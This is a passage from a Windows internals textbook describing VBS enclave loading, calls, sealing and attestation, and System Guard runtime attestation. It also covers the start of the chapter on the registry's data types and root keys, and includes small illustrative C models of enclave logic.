that must be loaded in the enclave. The Windows Loader code (in Ntdll.dll) searches the specified DLL
name, opens and validates its binary file, and creates a section object that is mapped with read-only
access right in the calling process.
After the loader maps the section, it parses the image’s import address table with the goal of
creating a list of the dependent modules (imported, delay loaded, and forwarded). For each module
found, the loader checks whether there is enough space in the enclave for mapping it and calculates
the correct image base address. As shown in Figure 9-40, which represents the System Guard Runtime
Attestation enclave, modules in the enclave are mapped using a top-down strategy. This means that
the main image is mapped at the highest possible virtual address, and all the dependent ones are
mapped at lower addresses, one next to the other. At this stage, for each module, the Windows
Loader calls the NtLoadEnclaveData kernel API.
FIGURE 9-40 The System Guard Runtime Attestation secure enclave (note the empty space at the base of the
enclave). [Figure shows modules mapped top-down from the top of the enclave at 0x026D'18200000:
SgrmEnclave_Secure.dll, ucrtbase_enclave.dll, bcrypt.dll, vertdll.dll, and bcryptPrimitives.dll, with private
and free space below them down to the enclave base at 0x026D'08200000.]
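The top-down placement just described can be modeled in a few lines of portable C. This is a hypothetical sketch: the image sizes are invented, and the real loader works from each image's headers and the enclave's actual address range; only the placement strategy mirrors the text.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ALLOC_GRANULARITY 0x10000ULL  /* 64 KB allocation granularity */

static uint64_t align_up(uint64_t v, uint64_t a) {
    return (v + a - 1) & ~(a - 1);
}

/* Places n images top-down below 'top'; bases[i] receives the base of
 * image i (image 0 is the main image, mapped highest). Each dependent
 * image is packed immediately below the previous one. Returns the
 * lowest base used; everything below it remains private free space. */
static uint64_t layout_top_down(const uint64_t *sizes, size_t n,
                                uint64_t top, uint64_t *bases) {
    uint64_t next = top;
    for (size_t i = 0; i < n; i++) {
        next -= align_up(sizes[i], ALLOC_GRANULARITY);
        bases[i] = next;
    }
    return next;
}
```

With a 10-MB enclave and a handful of small modules, most of the range stays free at the bottom, which is exactly the empty space visible in Figure 9-40.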
To load the specified image in the VBS enclave, the kernel starts a complex process that allows
the shared pages of its section object to be copied into the private pages of the enclave in VTL 1.
The MiMapImageForEnclaveUse function gets the control area of the section object and validates it
through SKCI. If the validation fails, the process is interrupted, and an error is returned to the caller.
(All the enclave’s modules should be correctly signed, as discussed previously.) Otherwise, the system
attaches to the secure system process and maps the image’s section object in its address space in
VTL 0. The shared pages of the module at this time could be valid or invalid; see Chapter 5 of Part 1
for further details. It then commits the virtual address space of the module in the containing process.
This creates private VTL 0 paging data structures for demand-zero PTEs, which will later be populated
by the Secure Kernel when the image is loaded in VTL 1.
The LOAD_ENCLAVE_MODULE secure call handler in VTL 1 obtains the SECURE_IMAGE of the new
module (created by SKCI) and verifies whether the image is suitable for use in a VBS-based enclave (by
verifying the digital signature characteristics). It then attaches to the secure system process in VTL 1
and maps the secure image at the same virtual address previously mapped by the NT kernel. This
allows the sharing of the prototype PTEs from VTL 0. The Secure Kernel then creates the secure VAD
that describes the module and inserts it into the VTL 1 address space of the enclave. It finally cycles
through each of the module’s section prototype PTEs. For each nonpresent prototype PTE, it attaches
to the secure system process and uses the GET_PHYSICAL_PAGE normal call to invoke the NT page
fault handler (MmAccessFault), which brings the shared page into memory. The Secure Kernel
performs a similar process for the private enclave pages, which have been previously committed by
the NT kernel in VTL 0 with demand-zero PTEs. The NT page fault handler in this case allocates zeroed
pages. The Secure Kernel copies the content of each shared physical page into each new private page
and applies any needed private relocations.
The loading of the module in the VBS-based enclave is now complete. The Secure Kernel applies
SLAT protection to the private enclave pages (the NT kernel has no access to the image’s code and
data in the enclave), unmaps the shared section from the secure system process, and yields execution
to the NT kernel. The Loader can now proceed with the next module.
Step 3: Enclave initialization After all the modules have been loaded into the enclave, an
application initializes the enclave using the InitializeEnclave API, specifying the maximum number of
threads supported by the enclave (which will be bound to threads able to perform enclave calls in the
containing process). The Secure Kernel’s INITIALIZE_ENCLAVE secure call handler verifies that the
policies specified during enclave creation are compatible with the policies expressed in the
configuration information of the primary image, verifies that the enclave’s platform library (Vertdll.dll)
is loaded, calculates the final 256-bit hash of the enclave (used for generating the enclave sealed
report), and creates all the secure enclave threads. When execution control is returned to the Windows
Loader code in VTL 0, the system performs the first enclave call, which executes the initialization code
of the platform DLL.
Step 4: Enclave calls (inbound and outbound) After the enclave has been correctly initialized, an
application can make an arbitrary number of calls into the enclave. All the callable functions in the
enclave need to be exported. An application can call the standard GetProcAddress API to get the
address of the enclave’s function and then use the CallEnclave routine to transfer execution control to
the secure enclave. In this scenario, which describes an inbound call, the NtCallEnclave kernel routine
performs the thread selection algorithm, which binds the calling VTL 0 thread to an enclave thread,
according to the following rules:
■ If the normal thread was not previously called by the enclave (enclaves support nested calls),
an arbitrary idle enclave thread is selected for execution. If no idle enclave threads are
available, the call blocks until an enclave thread becomes available (if the caller asked to wait;
otherwise the call simply fails).
■ If the normal thread was previously called by the enclave, the call into the enclave is made on
the same enclave thread that issued the previous call to the host.
A list of enclave thread descriptors is maintained by both the NT kernel and the Secure Kernel.
When a normal thread is bound to an enclave thread, the enclave thread is inserted in another list,
called the bound threads list. Enclave threads tracked by the latter are currently running and are no
longer available.
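The two selection rules can be sketched as a small, portable C model (the structure and names are illustrative, not the actual NT or Secure Kernel thread lists):

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of the enclave thread selection rules: a nested
 * call reuses the already-bound enclave thread; otherwise any idle
 * enclave thread is taken; with none idle the call fails (or would
 * block, if the caller asked to wait). */
typedef struct {
    int id;
    bool bound;     /* on the bound-threads list (currently running) */
    int bound_to;   /* VTL 0 thread currently bound to it, or -1 */
} EnclaveThread;

/* Returns the index of the selected enclave thread, or -1 on failure. */
static int select_enclave_thread(EnclaveThread *pool, size_t n, int caller) {
    for (size_t i = 0; i < n; i++)      /* nested call: reuse the binding */
        if (pool[i].bound && pool[i].bound_to == caller)
            return (int)i;
    for (size_t i = 0; i < n; i++)      /* otherwise: any idle thread */
        if (!pool[i].bound) {
            pool[i].bound = true;
            pool[i].bound_to = caller;
            return (int)i;
        }
    return -1;                          /* none idle: fail (or block) */
}
```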
After the thread selection algorithm succeeds, the NT kernel emits the CALLENCLAVE secure call.
The Secure Kernel creates a new stack frame for the enclave and returns to user mode. The first user-
mode function executed in the context of the enclave is RtlEnclaveCallDispatcher. If the enclave call
is the first one ever emitted, the dispatcher transfers execution to the initialization routine of the
VSM enclave runtime DLL (Vertdll.dll), which initializes the CRT, the loader, and all the services
provided to the enclave; it finally calls the DllMain function of the enclave’s main module and of all its
dependent images (specifying a DLL_PROCESS_ATTACH reason).
In normal situations, where the enclave platform DLL has already been initialized, the enclave
dispatcher invokes the DllMain of each module with a DLL_THREAD_ATTACH reason, verifies
whether the specified address of the target enclave’s function is valid, and, if so, finally calls the target
function. When the target enclave’s routine finishes its execution, it returns to VTL 0 by calling back
into the containing process. To do this, it still relies on the enclave platform DLL, which again calls the
NtCallEnclave kernel routine. Even though the latter is implemented slightly differently in the Secure
Kernel, it adopts a similar strategy for returning to VTL 0. The enclave itself can emit enclave calls to
execute some function in the context of the unsecure containing process. In this scenario (which
describes an outbound call), the enclave code uses the CallEnclave routine and specifies the address of
an exported function in the containing process’s main module.
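The alternation between inbound and outbound calls on one bound thread pair can be illustrated with a toy call-stack model (purely hypothetical; the real transitions are performed by NtCallEnclave in both kernels):

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model of nested enclave calls on one bound thread: an inbound
 * CallEnclave pushes an ENCLAVE frame, an outbound call pushes a HOST
 * frame, and each return pops one frame. Transitions must alternate,
 * which is why a nested inbound call must land on the same enclave
 * thread that issued the previous outbound call. */
typedef enum { HOST, ENCLAVE } Side;

typedef struct { Side frames[64]; int depth; } CallStack;

static bool call_into(CallStack *s, Side target) {
    Side cur = s->depth ? s->frames[s->depth - 1] : HOST;
    if (cur == target || s->depth == 64)
        return false;               /* must alternate sides */
    s->frames[s->depth++] = target;
    return true;
}

static bool call_return(CallStack *s) {
    if (s->depth == 0)
        return false;               /* nothing to return from */
    s->depth--;
    return true;
}
```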
Step 5: Termination and destruction When termination of an entire enclave is requested through
the TerminateEnclave API, all threads executing inside the enclave are forced to return to VTL 0.
Once termination of an enclave is requested, all further calls into the enclave fail. As threads
terminate, their VTL 1 thread state (including thread stacks) is destroyed. Once all threads have
stopped executing, the enclave can be destroyed. When the enclave is destroyed, all remaining VTL 1
state associated with the enclave is destroyed, too (including the entire enclave address space), and
all pages are freed in VTL 0. Finally, the enclave VAD is deleted and all committed enclave memory is
freed. Destruction is triggered when the containing process calls VirtualFree with the base of the
enclave’s address range. Destruction is not possible unless the enclave has been terminated or was
never initialized.
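The lifecycle rules of steps 1 through 5 condense into a small state model (a sketch; the state names are invented, and the real state is tracked jointly by the NT kernel and the Secure Kernel):

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical VBS enclave lifecycle: modules can be loaded only
 * before initialization, calls can be made only after it, and
 * destruction is allowed only if the enclave was terminated or was
 * never initialized. */
typedef enum { CREATED, INITIALIZED, TERMINATED, DESTROYED } EnclaveState;

static bool can_load_module(EnclaveState s) { return s == CREATED; }

static bool can_call(EnclaveState s) { return s == INITIALIZED; }

static bool can_destroy(EnclaveState s) {
    return s == CREATED || s == TERMINATED;  /* never initialized, or terminated */
}
```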
Note As we have discussed previously, all the memory pages that are mapped into the
enclave address space are private. This has multiple implications: no memory pages that
belong to the VTL 0 containing process are mapped in the enclave address space (and no
VADs describing the containing process’s allocations are present). So how can the
enclave access the memory pages of the containing process?
The answer is in the Secure Kernel page fault handler (SkmmAccessFault). In its code, the
fault handler checks whether the faulting process is an enclave. If it is, the fault handler
checks whether the fault happened because the enclave tried to execute some code
outside its region. In this case, it raises an access violation error. If the fault is due to a read
or write access outside the enclave’s address space, the secure page fault handler emits a
GET_PHYSICAL_PAGE normal service, which results in the VTL 0 access fault handler being
called. The VTL 0 handler checks the containing process’s VAD tree, obtains the PFN of the
page from its PTE—bringing it into memory if needed—and returns it to VTL 1. At this
stage, the Secure Kernel can create the necessary paging structures to map the physical
page at the same virtual address (which is guaranteed to be available thanks to the property
of the enclave itself) and resumes execution. The page is now valid in the context of the
secure enclave.
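The branching described in this note can be summarized with a short C sketch (the function and type names are invented; the real logic lives in SkmmAccessFault):

```c
#include <stdbool.h>
#include <stdint.h>

/* Sketch of the secure page-fault decision: faults inside the enclave
 * resolve normally against its private pages; execute faults outside
 * the region raise an access violation; read/write faults outside it
 * trigger a GET_PHYSICAL_PAGE normal call that maps the containing
 * process's page at the same virtual address. */
typedef enum { FAULT_EXECUTE, FAULT_READ, FAULT_WRITE } FaultType;
typedef enum { RESOLVE_IN_ENCLAVE, RAISE_ACCESS_VIOLATION, MAP_VTL0_PAGE } FaultAction;

static FaultAction enclave_fault_action(uint64_t addr, uint64_t base,
                                        uint64_t limit, FaultType t) {
    bool inside = addr >= base && addr < limit;
    if (inside)
        return RESOLVE_IN_ENCLAVE;     /* normal private-page fault */
    if (t == FAULT_EXECUTE)
        return RAISE_ACCESS_VIOLATION; /* no code runs outside the enclave */
    return MAP_VTL0_PAGE;              /* data access into the host process */
}
```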
Sealing and attestation
VBS-based enclaves, like hardware-based enclaves, support both sealing and attestation of data.
The term sealing refers to the encryption of arbitrary data using one or more encryption keys
that aren’t visible to the enclave’s code but are managed by the Secure Kernel and tied to the
machine and to the enclave’s identity. Enclaves never have access to those keys; instead, the Secure
Kernel offers services for sealing and unsealing arbitrary content (through the EnclaveSealData and
EnclaveUnsealData APIs) using an appropriate key designated by the enclave. At the time the data is
sealed, a set of parameters is supplied that controls which enclaves are permitted to unseal the data.
The following policies are supported:
■ Security version number (SVN) of the Secure Kernel and of the primary image No enclave
can unseal any data that was sealed by a later version of the enclave or the Secure Kernel.
■ Exact code The data can be unsealed only by an enclave that maps the same identical modules
as the enclave that sealed it. The Secure Kernel verifies the hash of the Unique ID of every
image mapped in the enclave to allow a proper unsealing.
■ Same image, family, or author The data can be unsealed only by an enclave that has the same
author ID, family ID, and/or image ID.
■ Runtime policy The data can be unsealed only if the unsealing enclave has the same debugging
policy as the original one (debuggable versus nondebuggable).
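These policies can be modeled as a simple identity comparison in C (a hypothetical sketch; the structure below is invented, and real enclave identities and module hashes are computed and checked by the Secure Kernel):

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

typedef enum { SEAL_EXACT_CODE, SEAL_SAME_IMAGE, SEAL_SAME_FAMILY,
               SEAL_SAME_AUTHOR, SEAL_RUNTIME_POLICY } SealPolicy;

typedef struct {
    uint32_t svn;                     /* security version number */
    uint32_t image_id, family_id, author_id;
    bool debuggable;                  /* debugging (runtime) policy */
    uint8_t module_hash[32];          /* stand-in for per-module Unique IDs */
} EnclaveIdentity;

/* True if 'unsealer' satisfies policy 'p' for data sealed by 'sealer'.
 * The SVN rule always applies: data sealed by a later version can never
 * be unsealed by an earlier one. */
static bool may_unseal(const EnclaveIdentity *sealer,
                       const EnclaveIdentity *unsealer, SealPolicy p) {
    if (unsealer->svn < sealer->svn)
        return false;
    switch (p) {
    case SEAL_EXACT_CODE:
        return memcmp(sealer->module_hash, unsealer->module_hash, 32) == 0;
    case SEAL_SAME_IMAGE:     return sealer->image_id == unsealer->image_id;
    case SEAL_SAME_FAMILY:    return sealer->family_id == unsealer->family_id;
    case SEAL_SAME_AUTHOR:    return sealer->author_id == unsealer->author_id;
    case SEAL_RUNTIME_POLICY: return sealer->debuggable == unsealer->debuggable;
    }
    return false;
}
```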
It is possible for every enclave to attest to any third party that it is running as a VBS enclave with all
the protections offered by the VBS enclave architecture. An enclave attestation report provides proof
that a specific enclave is running under the control of the Secure Kernel. The attestation report
contains the identity of all code loaded into the enclave as well as the policies controlling how the
enclave is executing. Describing the internal details of the sealing and attestation operations is
outside the scope of this book. An enclave can generate an attestation report through the
EnclaveGetAttestationReport API. The memory buffer returned by the API can be transmitted to
another enclave, which can attest to the integrity of the environment in which the original enclave
runs by verifying the attestation report through the EnclaveVerifyAttestationReport function.
System Guard runtime attestation
System Guard runtime attestation (SGRA) is an operating system integrity component that leverages
the aforementioned VBS enclaves—together with a remote attestation service component—to
provide strong guarantees about its execution environment. This environment is used to assert
sensitive system properties at runtime and allows a relying party to observe violations of security
promises that the system provides. The first implementation of this new technology was introduced
in the Windows 10 April 2018 Update (RS4).
SGRA allows an application to view a statement about the security posture of the device. This
statement is composed of three parts:
■ A session report, which includes a security level describing the attestable boot-time properties
of the device
■ A runtime report, which describes the runtime state of the device
■ A signed session certificate, which can be used to verify the reports
The SGRA service, SgrmBroker.exe, hosts a component (SgrmEnclave_secure.dll) that runs in VTL 1
as a VBS enclave and continually asserts the system for runtime violations of security features. These
assertions are surfaced in the runtime report, which can be verified on the backend by a relying party.
Because the assertions run in a separate domain of trust, directly attacking the contents of the
runtime report becomes difficult.
SGRA internals
Figure 9-41 shows a high-level overview of the architecture of Windows Defender System Guard
runtime attestation, which consists of the following client-side components:
■ The VTL 1 assertion engine: SgrmEnclave_secure.dll
■ A VTL 0 kernel-mode agent: SgrmAgent.sys
■ A VTL 0 WinTCB-protected broker process hosting the assertion engine: SgrmBroker.exe
■ A VTL 0 LPAC process used by the WinTCBPP broker process to interact with the networking
stack: SgrmLpac.exe
FIGURE 9-41 Windows Defender System Guard runtime attestation’s architecture. [Figure shows, in VTL 0,
the Windows Defender System Guard API used by Windows Defender ATP, Windows Defender AV, critical
services, and third-party software, plus the runtime monitor broker and runtime monitor agent; in VTL 1,
the runtime monitor enclave (assertion engine). Remote components include the attestation service and the
Windows Defender ATP cloud.]
To be able to rapidly respond to threats, SGRA includes a dynamic scripting engine (Lua) forming
the core of the assertion mechanism that executes in a VTL 1 enclave—an approach that allows
frequent assertion logic updates.
Due to the isolation provided by the VBS enclave, threads executing in VTL 1 are limited in terms of
their ability to access VTL 0 NT APIs. Therefore, for the runtime component of SGRA to perform
meaningful work, a way of working around the limited VBS enclave API surface is necessary.
An agent-based approach is implemented to expose VTL 0 facilities to the logic running in VTL 1;
these facilities are termed assists and are serviced by the SgrmBroker user-mode component or by an
agent driver running in VTL 0 kernel mode (SgrmAgent.sys). The VTL 1 logic running in the enclave
can call out to these VTL 0 components to request assists that provide a range of facilities, including
NT kernel synchronization primitives, page-mapping capabilities, and so on.
As an example of how this mechanism works, SGRA is capable of allowing the VTL 1 assertion
engine to directly read VTL 0–owned physical pages. The enclave requests a mapping of an arbitrary
page via an assist. The page is then locked and mapped into the SgrmBroker VTL 0 address space
(making it resident). Because VBS enclaves have direct access to the host process address space, the
secure logic can read directly from the mapped virtual addresses. These reads must be synchronized
with the VTL 0 kernel itself; the VTL 0 resident broker agent (the SgrmAgent.sys driver) is also used to
perform this synchronization.
Assertion logic
As mentioned earlier, SGRA asserts system security properties at runtime. These assertions are
executed within the assertion engine hosted in the VBS-based enclave. Signed Lua bytecode
describing the assertion logic is provided to the assertion engine during startup.
Assertions are run periodically. When a violation of an asserted property is discovered (that is, when
the assertion “fails”), the failure is recorded and stored within the enclave. This failure will be exposed
to a relying party in the runtime report that is generated and signed (with the session certificate)
within the enclave.
An example of the assertion capabilities provided by SGRA is the set of asserts surrounding various
executive process object attributes—for example, the periodic enumeration of running processes and
the assertion of the state of a process’s protection bits that govern protected process policies.
The flow for the assertion engine performing this check can be approximated by the following steps:
1. The assertion engine running within VTL 1 calls into its VTL 0 host process (SgrmBroker) to
request that an executive process object be referenced by the kernel.
2. The broker process forwards this request to the kernel-mode agent (SgrmAgent), which
services the request by obtaining a reference to the requested executive process object.
3. The agent notifies the broker that the request has been serviced and passes any necessary
metadata down to the broker.
4. The broker forwards this response to the requesting VTL 1 assertion logic.
5. The logic can then elect to have the physical page backing the referenced executive process
object locked and mapped into its accessible address space; this is done by calling out of the
enclave using a flow similar to steps 1 through 4.
6. Once the page is mapped, the VTL 1 engine can read it directly and check the executive
process object’s protection bits against its internally held context.
7. The VTL 1 logic again calls out to VTL 0 to unwind the page mapping and the kernel object
reference.
Reports and trust establishment
A WinRT-based API is exposed to allow relying parties to obtain the SGRA session certificate and the
signed session and runtime reports. This API is not public and is available under NDA to vendors that
are part of the Microsoft Virus Initiative (note that Microsoft Defender Advanced Threat Protection is
currently the only in-box component that interfaces directly with SGRA via this API).
The flow for obtaining a trusted statement from SGRA is as follows:
1. A session is created between the relying party and SGRA. Establishment of the session requires
a network connection. The SgrmEnclave assertion engine (running in VTL 1) generates a
public-private key pair, and the SgrmBroker protected process retrieves the TCG log and the
VBS attestation report, sending them to Microsoft’s System Guard attestation service with the
public component of the key generated in the previous step.
2. The attestation service verifies the TCG log (from the TPM) and the VBS attestation report (as
proof that the logic is running within a VBS enclave) and generates a session report describing
the attested boot-time properties of the device. It signs the public key with an SGRA
attestation service intermediate key to create a certificate that will be used to verify runtime
reports.
3. The session report and the certificate are returned to the relying party. From this point, the
relying party can verify the validity of the session report and runtime certificate.
4. Periodically, the relying party can request a runtime report from SGRA using the established
session: the SgrmEnclave assertion engine generates a runtime report describing the state of
the assertions that have been run. The report is signed using the paired private key generated
during session creation and returned to the relying party (the private key never leaves
the enclave).
5. The relying party can verify the validity of the runtime report against the runtime certificate
obtained earlier and make a policy decision based on both the contents of the session report
(boot-time attested state) and the runtime report (asserted state).
SGRA provides an API that relying parties can use to attest to the state of the device at a point
in time. The API returns a runtime report that details the claims that Windows Defender System
Guard runtime attestation makes about the security posture of the system. These claims include
assertions, which are runtime measurements of sensitive system properties. For example, an app
could ask Windows Defender System Guard to measure the security of the system from the
hardware-backed enclave and return a report. The details in this report can be used by the app to
decide whether to perform a sensitive financial transaction or display personal information.
As discussed in the previous section, a VBS-based enclave can also expose an enclave attestation
report signed by a VBS-specific signing key. If Windows Defender System Guard can obtain proof that
the host system is running with VSM active, it can use this proof with a signed session report to ensure
that the particular enclave is running. Establishing the trust necessary to guarantee that the runtime
report is authentic, therefore, requires the following:
1. Attesting to the boot state of the machine; the OS, hypervisor, and Secure Kernel (SK) binaries
must be signed by Microsoft and configured according to a secure policy.
2. Binding trust between the TPM and the health of the hypervisor to allow trust in the Measured
Boot Log.
3. Extracting the needed keys (VSM IDKs) from the Measured Boot Log and using them to verify
the VBS enclave signature (see Chapter 12 for further details).
4. Signing the public component of an ephemeral key pair generated within the enclave with a
trusted Certificate Authority to issue a session certificate.
5. Signing the runtime report with the ephemeral private key.
Networking calls between the enclave and the Windows Defender System Guard attestation service
are made from VTL 0. However, the design of the attestation protocol ensures that it is resilient against
tampering even over untrusted transport mechanisms.
Numerous underlying technologies are required before the chain of trust described earlier can be
sufficiently established. To inform a relying party of the level of trust in the runtime report that they can
expect on any particular configuration, a security level is assigned to each Windows Defender System
Guard attestation service-signed session report. The security level reflects the underlying technologies
enabled on the platform and attributes a level of trust based on the capabilities of the platform.
Microsoft is mapping the enablement of various security technologies to security levels and will share
this mapping when the API is published for third-party use. The highest level of trust is likely to
require at least the following features:
■ VBS-capable hardware and OEM configuration.
■ Dynamic root-of-trust measurements at boot.
■ Secure Boot to verify hypervisor, NT, and SK images.
■ A secure policy ensuring Hypervisor-Enforced Code Integrity (HVCI) and kernel-mode code
integrity (KMCI), with test-signing and kernel debugging disabled.
■ The presence of the ELAM driver.
Conclusion
Windows is able to manage and run multiple virtual machines thanks to the Hyper-V hypervisor and
its virtualization stack, which, combined, support different operating systems running in a VM. Over
the years, the two components have evolved to provide more optimizations and advanced features
for the VMs, like nested virtualization, multiple schedulers for the virtual processors, different types
of virtual hardware support, VMBus, VA-backed VMs, and so on.
Virtualization-based security provides the root operating system with a new level of protection
against malware and stealthy rootkits, which are no longer able to steal private and confidential
information from the root operating system’s memory. The Secure Kernel uses the services supplied
by the Windows hypervisor to create a new execution environment (VTL 1) that is protected and not
accessible to the software running in the main OS. Furthermore, the Secure Kernel delivers multiple
services to the Windows ecosystem that help to maintain a more secure environment.
The Secure Kernel also defines Isolated User Mode, allowing user-mode code to be executed in
the new protected environment through trustlets, secure devices, and enclaves. The chapter ended
with an analysis of System Guard runtime attestation, a component that uses the services exposed
by the Secure Kernel to measure the workstation’s execution environment and to provide strong
guarantees about its integrity.
In the next chapter, we look at the management and diagnostics components of Windows and
discuss important mechanisms involved in their infrastructure: the registry, services, the Task
Scheduler, Windows Management Instrumentation (WMI), kernel Event Tracing, and so on.
CHAPTER 10
Management, diagnostics, and tracing
This chapter describes fundamental mechanisms in the Microsoft Windows operating system that
are critical to its management and configuration. In particular, we describe the Windows registry,
services, the Unified Background process manager, and Windows Management Instrumentation (WMI).
The chapter also presents some fundamental components used for diagnosis and tracing purposes like
Event Tracing for Windows (ETW), Windows Notification Facility (WNF), and Windows Error Reporting
(WER). A discussion on the Windows Global flags and a brief introduction on the kernel and User Shim
Engine conclude the chapter.
The registry
The registry plays a key role in the configuration and control of Windows systems. It is the repository
for both systemwide and per-user settings. Although most people think of the registry as static data
stored on the hard disk, as you’ll see in this section, the registry is also a window into various in-
memory structures maintained by the Windows executive and kernel.
We start by providing you with an overview of the registry structure, a discussion of the data
types it supports, and a brief tour of the key information Windows maintains in the registry. Then we
look inside the internals of the configuration manager, the executive component responsible for
implementing the registry database. Among the topics we cover are the internal on-disk structure of
the registry, how Windows retrieves configuration information when an application requests it, and
what measures are employed to protect this critical system database.
Viewing and changing the registry
In general, you should never have to edit the registry directly. Application and system settings stored
in the registry that require changes should have a corresponding user interface to control their
modification. However, as we mention several times in this book, some advanced and debug settings
have no editing user interface. Therefore, both graphical user interface (GUI) and command-line tools
are included with Windows to enable you to view and modify the registry.
Windows comes with one main GUI tool for editing the registry—Regedit.exe—and several
command-line registry tools. Reg.exe, for instance, has the ability to import, export, back up, and
restore keys, as well as to compare, modify, and delete keys and values. It can also set or query flags
used in UAC virtualization. Regini.exe, on the other hand, allows you to import registry data based on
text files that contain ASCII or Unicode configuration data.
The Windows Driver Kit (WDK) also supplies a redistributable component, Offregs.dll, which hosts
the Offline Registry Library. This library allows loading registry hive files (covered in the “Hives”
section later in the chapter) in their binary format and applying operations on the files themselves,
bypassing the usual logical loading and mapping that Windows requires for registry operations. Its
use is primarily to assist in offline registry access, such as for purposes of integrity checking and
validation. It can also provide performance benefits if the underlying data is not meant to be visible
to the system, because the access is done through local file I/O instead of registry system calls.
Registry usage
There are four principal times at which configuration data is read:
■ During the initial boot process, the boot loader reads configuration data and the list of boot
device drivers to load into memory before initializing the kernel. Because the Boot
Configuration Database (BCD) is really stored in a registry hive, one could argue that registry
access happens even earlier, when the Boot Manager displays the list of operating systems.
■ During the kernel boot process, the kernel reads settings that specify which device drivers to
load and how various system elements—such as the memory manager and process manager—
configure themselves and tune system behavior.
■ During logon, Explorer and other Windows components read per-user preferences from the
registry, including network drive-letter mappings, desktop wallpaper, screen saver, menu
behavior, icon placement, and, perhaps most importantly, which startup programs to launch
and which files were most recently accessed.
■ During their startup, applications read systemwide settings, such as a list of optionally installed
components and licensing data, as well as per-user settings that might include menu and
toolbar placement and a list of most recently accessed documents.
However, the registry can be read at other times as well, such as in response to a modification of a
registry value or key. Although the registry provides asynchronous callbacks that are the preferred way
to receive change notifications, some applications constantly monitor their configuration settings in the
registry through polling and automatically take updated settings into account. In general, however, on
an idle system there should be no registry activity and such applications violate best practices. (Process
Monitor, from Sysinternals, is a great tool for tracking down such activity and the applications at fault.)
The registry is commonly modified in the following cases:
■ Although not a modification, the registry’s initial structure and many default settings are
defined by a prototype version of the registry that ships on the Windows setup media and is
copied onto a new installation.
■ Application setup utilities create default application settings and settings that reflect
installation configuration choices.
■ During the installation of a device driver, the Plug and Play system creates settings in the
registry that tell the I/O manager how to start the driver and creates other settings that
configure the driver’s operation. (See Chapter 6, “I/O system,” in Part 1 for more information
on how device drivers are installed.)
■ When you change application or system settings through user interfaces, the changes are
often stored in the registry.
Registry data types
The registry is a database whose structure is similar to that of a disk volume. The registry contains keys,
which are similar to a disk’s directories, and values, which are comparable to files on a disk. A key is a
container that can consist of other keys (subkeys) or values. Values, on the other hand, store data. Top-
level keys are root keys. Throughout this section, we’ll use the words subkey and key interchangeably.
Both keys and values borrow their naming convention from the file system. Thus, you can uniquely
identify a value with the name mark, which is stored in a key called trade, with the name trade\mark.
One exception to this naming scheme is each key’s unnamed value. Regedit displays the unnamed
value as (Default).
Values store different kinds of data and can be one of the 12 types listed in Table 10-1. The majority
of registry values are REG_DWORD, REG_BINARY, or REG_SZ. Values of type REG_DWORD can store
numbers or Booleans (true/false values); REG_BINARY values can store numbers larger than 32 bits or
raw data such as encrypted passwords; REG_SZ values store strings (Unicode, of course) that can represent elements such as names, file names, paths, and types.
TABLE 10-1 Registry value types

REG_NONE: No value type
REG_SZ: Fixed-length Unicode string
REG_EXPAND_SZ: Variable-length Unicode string that can have embedded environment variables
REG_BINARY: Arbitrary-length binary data
REG_DWORD: 32-bit number
REG_DWORD_BIG_ENDIAN: 32-bit number, with high byte first
REG_LINK: Unicode symbolic link
REG_MULTI_SZ: Array of Unicode NULL-terminated strings
REG_RESOURCE_LIST: Hardware resource description
REG_FULL_RESOURCE_DESCRIPTOR: Hardware resource description
REG_RESOURCE_REQUIREMENTS_LIST: Resource requirements
REG_QWORD: 64-bit number
The REG_LINK type is particularly interesting because it lets a key transparently point to another
key. When you traverse the registry through a link, the path searching continues at the target of the
link. For example, if \Root1\Link has a REG_LINK value of \Root2\RegKey and RegKey contains the value
RegValue, two paths identify RegValue: \Root1\Link\RegValue and \Root2\RegKey\RegValue. As explained in the next section, Windows prominently uses registry links: three of the nine registry root keys are just links to subkeys within the nonlink root keys.
Registry logical structure
You can chart the organization of the registry via the data stored within it. There are nine root keys
(and you can’t add new root keys or delete existing ones) that store information, as shown in Table 10-2.
TABLE 10-2 The nine root keys

HKEY_CURRENT_USER: Stores data associated with the currently logged-on user
HKEY_CURRENT_USER_LOCAL_SETTINGS: Stores data associated with the currently logged-on user that are local to the machine and are excluded from a roaming user profile
HKEY_USERS: Stores information about all the accounts on the machine
HKEY_CLASSES_ROOT: Stores file association and Component Object Model (COM) object registration information
HKEY_LOCAL_MACHINE: Stores system-related information
HKEY_PERFORMANCE_DATA: Stores performance information
HKEY_PERFORMANCE_NLSTEXT: Stores text strings that describe performance counters in the local language of the area in which the computer system is running
HKEY_PERFORMANCE_TEXT: Stores text strings that describe performance counters in US English
HKEY_CURRENT_CONFIG: Stores some information about the current hardware profile (deprecated)
Why do root-key names begin with an H? Because the root-key names represent Windows handles
(H) to keys (KEY). As mentioned in Chapter 1, “Concepts and tools” of Part 1, HKLM is an abbreviation
used for HKEY_LOCAL_MACHINE. Table 10-3 lists all the root keys and their abbreviations. The follow-
ing sections explain in detail the contents and purpose of each of these root keys.
TABLE 10-3 Registry root keys

HKEY_CURRENT_USER (HKCU): Points to the user profile of the currently logged-on user. Link: the subkey under HKEY_USERS corresponding to the currently logged-on user.
HKEY_CURRENT_USER_LOCAL_SETTINGS (HKCULS): Points to the local settings of the currently logged-on user. Link: HKCU\Software\Classes\Local Settings.
HKEY_USERS (HKU): Contains subkeys for all loaded user profiles. Not a link.
HKEY_CLASSES_ROOT (HKCR): Contains file association and COM registration information. Not a direct link, but rather a merged view of HKLM\SOFTWARE\Classes and HKEY_USERS\<SID>\SOFTWARE\Classes.
HKEY_LOCAL_MACHINE (HKLM): Global settings for the machine. Not a link.
HKEY_CURRENT_CONFIG (HKCC): Current hardware profile. Link: HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current.
HKEY_PERFORMANCE_DATA (HKPD): Performance counters. Not a link.
HKEY_PERFORMANCE_NLSTEXT (HKPNT): Performance counter text strings. Not a link.
HKEY_PERFORMANCE_TEXT (HKPT): Performance counter text strings in US English. Not a link.
HKEY_CURRENT_USER
The HKCU root key contains data regarding the preferences and software configuration of the locally
logged-on user. It points to the currently logged-on user’s user profile, located on the hard disk at
\Users\<username>\Ntuser.dat. (See the section “Registry internals” later in this chapter to find out how
